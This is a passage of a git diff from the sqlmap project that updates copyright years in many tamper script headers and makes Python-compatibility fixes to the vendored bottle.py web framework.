-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/tamper/percentage.py b/tamper/percentage.py
index edce9d630..e65dc9573 100644
--- a/tamper/percentage.py
+++ b/tamper/percentage.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/tamper/plus2concat.py b/tamper/plus2concat.py
index 13ac64e16..b7f862aa9 100644
--- a/tamper/plus2concat.py
+++ b/tamper/plus2concat.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/tamper/plus2fnconcat.py b/tamper/plus2fnconcat.py
index 6a50132af..39cd9ed25 100644
--- a/tamper/plus2fnconcat.py
+++ b/tamper/plus2fnconcat.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/tamper/randomcase.py b/tamper/randomcase.py
index ce614e474..b2737445e 100644
--- a/tamper/randomcase.py
+++ b/tamper/randomcase.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/tamper/randomcomments.py b/tamper/randomcomments.py
index 59d79819e..a6d378f21 100644
--- a/tamper/randomcomments.py
+++ b/tamper/randomcomments.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/tamper/schemasplit.py b/tamper/schemasplit.py
index a4f0ca2ad..c05b45ad0 100644
--- a/tamper/schemasplit.py
+++ b/tamper/schemasplit.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/tamper/scientific.py b/tamper/scientific.py
index 28f94a825..95f401581 100644
--- a/tamper/scientific.py
+++ b/tamper/scientific.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/tamper/sleep2getlock.py b/tamper/sleep2getlock.py
index f249c9eac..5fb1cd01a 100644
--- a/tamper/sleep2getlock.py
+++ b/tamper/sleep2getlock.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/tamper/sp_password.py b/tamper/sp_password.py
index 9169cd593..a693712c6 100644
--- a/tamper/sp_password.py
+++ b/tamper/sp_password.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/tamper/space2comment.py b/tamper/space2comment.py
index 35c4bbad6..59689836a 100644
--- a/tamper/space2comment.py
+++ b/tamper/space2comment.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/tamper/space2dash.py b/tamper/space2dash.py
index 6079a3312..b23000831 100644
--- a/tamper/space2dash.py
+++ b/tamper/space2dash.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/tamper/space2hash.py b/tamper/space2hash.py
index 797fde116..9cc185546 100644
--- a/tamper/space2hash.py
+++ b/tamper/space2hash.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/tamper/space2morecomment.py b/tamper/space2morecomment.py
index 67d318df2..bd29e1d6f 100644
--- a/tamper/space2morecomment.py
+++ b/tamper/space2morecomment.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/tamper/space2morehash.py b/tamper/space2morehash.py
index a5a7ee447..77ff792c9 100644
--- a/tamper/space2morehash.py
+++ b/tamper/space2morehash.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/tamper/space2mssqlblank.py b/tamper/space2mssqlblank.py
index 46c155de6..01a3f6b93 100644
--- a/tamper/space2mssqlblank.py
+++ b/tamper/space2mssqlblank.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/tamper/space2mssqlhash.py b/tamper/space2mssqlhash.py
index dd6f68764..abe95af15 100644
--- a/tamper/space2mssqlhash.py
+++ b/tamper/space2mssqlhash.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/tamper/space2mysqlblank.py b/tamper/space2mysqlblank.py
index 7f52f22dc..32e18e7e5 100644
--- a/tamper/space2mysqlblank.py
+++ b/tamper/space2mysqlblank.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/tamper/space2mysqldash.py b/tamper/space2mysqldash.py
index c94595547..2c54f9a6a 100644
--- a/tamper/space2mysqldash.py
+++ b/tamper/space2mysqldash.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/tamper/space2plus.py b/tamper/space2plus.py
index 94903b3c5..d46f41064 100644
--- a/tamper/space2plus.py
+++ b/tamper/space2plus.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/tamper/space2randomblank.py b/tamper/space2randomblank.py
index c050fb2af..880fcc08e 100644
--- a/tamper/space2randomblank.py
+++ b/tamper/space2randomblank.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/tamper/substring2leftright.py b/tamper/substring2leftright.py
index 0d2a36010..773ae3300 100644
--- a/tamper/substring2leftright.py
+++ b/tamper/substring2leftright.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/tamper/symboliclogical.py b/tamper/symboliclogical.py
index 39753be94..80258af5b 100644
--- a/tamper/symboliclogical.py
+++ b/tamper/symboliclogical.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/tamper/unionalltounion.py b/tamper/unionalltounion.py
index daaf69596..2b286553d 100644
--- a/tamper/unionalltounion.py
+++ b/tamper/unionalltounion.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/tamper/unmagicquotes.py b/tamper/unmagicquotes.py
index 960c0012c..b8e04f8d6 100644
--- a/tamper/unmagicquotes.py
+++ b/tamper/unmagicquotes.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/tamper/uppercase.py b/tamper/uppercase.py
index 83885dd6c..c2a03025c 100644
--- a/tamper/uppercase.py
+++ b/tamper/uppercase.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/tamper/varnish.py b/tamper/varnish.py
index f13b28ba6..09cb37f7b 100644
--- a/tamper/varnish.py
+++ b/tamper/varnish.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/tamper/versionedkeywords.py b/tamper/versionedkeywords.py
index 7c57c5c33..cfd116e16 100644
--- a/tamper/versionedkeywords.py
+++ b/tamper/versionedkeywords.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/tamper/versionedmorekeywords.py b/tamper/versionedmorekeywords.py
index f4688c197..1e2de36bd 100644
--- a/tamper/versionedmorekeywords.py
+++ b/tamper/versionedmorekeywords.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/tamper/xforwardedfor.py b/tamper/xforwardedfor.py
index 004f0f89e..79edb8b01 100644
--- a/tamper/xforwardedfor.py
+++ b/tamper/xforwardedfor.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/thirdparty/bottle/bottle.py b/thirdparty/bottle/bottle.py
index 48aefbb69..916e2607d 100644
--- a/thirdparty/bottle/bottle.py
+++ b/thirdparty/bottle/bottle.py
@@ -69,12 +69,12 @@ if __name__ == '__main__':
# Imports and Python 2/3 unification ##########################################
###############################################################################
-import base64, calendar, cgi, email.utils, functools, hmac, imp, itertools,\
+import base64, calendar, cgi, email.utils, functools, hmac, itertools,\
mimetypes, os, re, tempfile, threading, time, warnings, weakref, hashlib
from types import FunctionType
from datetime import date as datedate, datetime, timedelta
-from tempfile import TemporaryFile
+from tempfile import NamedTemporaryFile
from traceback import format_exc, print_exc
from unicodedata import normalize
@@ -83,34 +83,6 @@ try:
except ImportError:
from json import dumps as json_dumps, loads as json_lds
-# inspect.getargspec was removed in Python 3.6, use
-# Signature-based version where we can (Python 3.3+)
-try:
- from inspect import signature
- def getargspec(func):
- params = signature(func).parameters
- args, varargs, keywords, defaults = [], None, None, []
- for name, param in params.items():
- if param.kind == param.VAR_POSITIONAL:
- varargs = name
- elif param.kind == param.VAR_KEYWORD:
- keywords = name
- else:
- args.append(name)
- if param.default is not param.empty:
- defaults.append(param.default)
- return (args, varargs, keywords, tuple(defaults) or None)
-except ImportError:
- try:
- from inspect import getfullargspec
- def getargspec(func):
- spec = getfullargspec(func)
- kwargs = makelist(spec[0]) + makelist(spec.kwonlyargs)
- return kwargs, spec[1], spec[2], spec[3]
- except ImportError:
- from inspect import getargspec
-
-
py = sys.version_info
py3k = py.major > 2
@@ -123,9 +95,17 @@ if py3k:
urlunquote = functools.partial(urlunquote, encoding='latin1')
from http.cookies import SimpleCookie, Morsel, CookieError
from collections.abc import MutableMapping as DictMixin
+ from types import ModuleType as new_module
import pickle
from io import BytesIO
import configparser
+ # getfullargspec was deprecated in 3.5 and un-deprecated in 3.6
+ # getargspec was deprecated in 3.0 and removed in 3.11
+ from inspect import getfullargspec
+ def getargspec(func):
+ spec = getfullargspec(func)
+ kwargs = makelist(spec[0]) + makelist(spec.kwonlyargs)
+ return kwargs, spec[1], spec[2], spec[3]
basestring = str
unicode = str
@@ -143,9 +123,12 @@ else: # 2.x
from Cookie import SimpleCookie, Morsel, CookieError
from itertools import imap
import cPickle as pickle
+ from imp import new_module
from StringIO import StringIO as BytesIO
import ConfigParser as configparser
from collections import MutableMapping as DictMixin
+ from inspect import getargspec
+
unicode = unicode
json_loads = json_lds
exec(compile('def _raise(*a): raise a[0], a[1], a[2]', '', 'exec'))
@@ -256,6 +239,7 @@ class lazy_attribute(object):
setattr(cls, self.__name__, value)
return value
+
###############################################################################
# Exceptions and Events #######################################################
###############################################################################
@@ -1353,7 +1337,7 @@ class BaseRequest(object):
body.write(part)
body_size += len(part)
if not is_temp_file and body_size > self.MEMFILE_MAX:
- body, tmp = TemporaryFile(mode='w+b'), body
+ body, tmp = NamedTemporaryFile(mode='w+b'), body
body.write(tmp.getvalue())
del tmp
is_temp_file = True
@@ -2010,6 +1994,7 @@ class JSONPlugin(object):
dumps = self.json_dumps
if not self.json_dumps: return callback
+ @functools.wraps(callback)
def wrapper(*a, **ka):
try:
rv = callback(*a, **ka)
@@ -2057,7 +2042,7 @@ class _ImportRedirect(object):
""" Create a virtual package that redirects imports (see PEP 302). """
self.name = name
self.impmask = impmask
- self.module = sys.modules.setdefault(name, imp.new_module(name))
+ self.module = sys.modules.setdefault(name, new_module(name))
self.module.__dict__.update({
'__file__': __file__,
'__path__': [],
@@ -2066,10 +2051,15 @@ class _ImportRedirect(object):
})
sys.meta_path.append(self)
+ def find_spec(self, fullname, path, target=None):
+ if '.' not in fullname: return
+ if fullname.rsplit('.', 1)[0] != self.name: return
+ from importlib.util import spec_from_loader
+ return spec_from_loader(fullname, self)
+
def find_module(self, fullname, path=None):
if '.' not in fullname: return
- packname = fullname.rsplit('.', 1)[0]
- if packname != self.name: return
+ if fullname.rsplit('.', 1)[0] != self.name: return
return self
def load_module(self, fullname):
@@ -2825,18 +2815,15 @@ def redirect(url, code=None):
raise res
-def _file_iter_range(fp, offset, bytes, maxread=1024 * 1024, close=False):
- """ Yield chunks from a range in a file, optionally closing it at the end.
- No chunk is bigger than maxread. """
+def _rangeiter(fp, offset, limit, bufsize=1024 * 1024):
+ """ Yield chunks from a range in a file. """
fp.seek(offset)
- while bytes > 0:
- part = fp.read(min(bytes, maxread))
+ while limit > 0:
+ part = fp.read(min(limit, bufsize))
if not part:
break
- bytes -= len(part)
+ limit -= len(part)
yield part
- if close:
- fp.close()
def static_file(filename, root,
@@ -2940,9 +2927,10 @@ def static_file(filename, root,
if not ranges:
return HTTPError(416, "Requested Range Not Satisfiable")
offset, end = ranges[0]
+ rlen = end - offset
headers["Content-Range"] = "bytes %d-%d/%d" % (offset, end - 1, clen)
- headers["Content-Length"] = str(end - offset)
- if body: body = _file_iter_range(body, offset, end - offset, close=True)
+ headers["Content-Length"] = str(rlen)
+ if body: body = _closeiter(_rangeiter(body, offset, rlen), body.close)
return HTTPResponse(body, status=206, **headers)
return HTTPResponse(body, **headers)
@@ -3359,7 +3347,7 @@ class MeinheldServer(ServerAdapter):
class FapwsServer(ServerAdapter):
- """ Extremely fast webserver using libev. See http://www.fapws.org/ """
+ """ Extremely fast webserver using libev. See https://github.com/william-os4y/fapws3 """
def run(self, handler): # pragma: no cover
depr(0, 13, "fapws3 is not maintained and support will be dropped.")
@@ -4276,7 +4264,7 @@ def view(tpl_name, **defaults):
tplvars.update(result)
return template(tpl_name, **tplvars)
elif result is None:
- return template(tpl_name, defaults)
+ return template(tpl_name, **defaults)
return result
return wrapper